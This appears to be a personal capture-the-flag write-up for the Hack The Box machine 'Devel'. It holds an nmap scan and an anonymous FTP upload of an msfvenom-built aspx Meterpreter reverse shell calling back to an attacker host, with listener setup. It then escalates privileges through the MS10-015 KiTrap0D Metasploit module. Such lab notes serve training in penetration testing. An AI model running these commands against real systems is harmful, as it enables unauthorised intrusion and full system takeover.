# Devel
> # 10.10.10.5

nmap
>PORT   STATE SERVICE VERSION
[21/tcp](portscan.md#21) open  ftp     Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|_  SYST: Windows_NT
[80/tcp](portscan.md#80) open  http    Microsoft IIS httpd 7.5
|_http-server-header: Microsoft-IIS/7.5
|_http-title: IIS7



The webpage is a simple image that tell us what is running on this web server
![[devel1.png]]
From wikipedia:
>Internet Information Services web server software created from microsoft
*iis 7 run on windows server 2008

And that's it for the port 80, let's see what's going on on the 21 with the anonymous ftp:
>* we can navigate trough folder and file but nothing interesting
>* the pic iis7 is in the first landing directory
>* we can upload file: ![[devel2.png]]

Knowing that we can upload file and their exact location on the webservice we can craft a reverse shell and upload it.
It's a windows system this means that the web server can run aspx extension so let's upload an aspx rev
```bash
#craft shell
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.3 LPORT=42069 -f aspx > rev.aspx

#upload it
ftp 10.10.10.5
#name> anonymous
#password> blank
put rev.aspx
exit

#start listener
#usually nc but start up meterpreter
msfconsole
use multi/handler  
set payload windows/meterpreter/reverse_tcp  
exploit

#on a different window or browser the webpage:
curl 10.10.10.5/rev.aspx
```
![[devel3.png]]
guess what, we're in but cannot access to the user folder yet.

Nothing with manual enum, switch to meterpreter shell(already done it)
![[devel5.png]]
put the session in background and use the exploit suggester:
>use  post/multi/recon/local_exploit_suggester
>set session \<session number>
>exploit

Not gonna lie, my friends found what they were looking for with this exploit but i didn't we're taking the hard road.
The "systeminfo" command return this data:
![[devel11.png]]
We're on a x64 architecture and Windows 7 Enterprise distribution, looking on the internet for additional info [wikipedia](https://en.wikipedia.org/wiki/List_of_Microsoft_Windows_versions) teach us that:
![[devel9.png]]
This version of windows 7 is a NT version

Googling "windows 7 nt exploit" this is the [first result](https://www.cvedetails.com/vulnerability-list/vendor_id-26/product_id-39/Microsoft-Windows-Nt.html)
![[devel10.png]]
And this is the first [CVE](https://www.cvedetails.com/cve/CVE-2010-0232/), the most recent one, the description is the following:
```txt
MS10-015: Vulnerabilities in Windows Kernel Could Allow
Elevation of Privilege
```
Look's like what we were looking for.
Exploit db give us a bit more info and explain how it [actually works](https://www.exploit-db.com/exploits/11199):
```txt
All 32bit x86 versions of Windows NT released since 27-Jul-1993 are believed to
be affected, including but not limited to the following actively supported
versions:

    - Windows 2000
    - Windows XP
    - Windows Server 2003
    - Windows Vista
    - Windows Server 2008
    - Windows 7
```

Let's get back to our meterpreter shell, put the session in background and set the [new exploit](https://www.rapid7.com/db/modules/exploit/windows/local/ms10_015_kitrap0d/)
>use windows/local/ms10_015_kitrap0d
>set session \<session number>
>exploit

And here you go.
![[devel8.png]]
We're root.

#machine #msf #msfvenom #windows7 



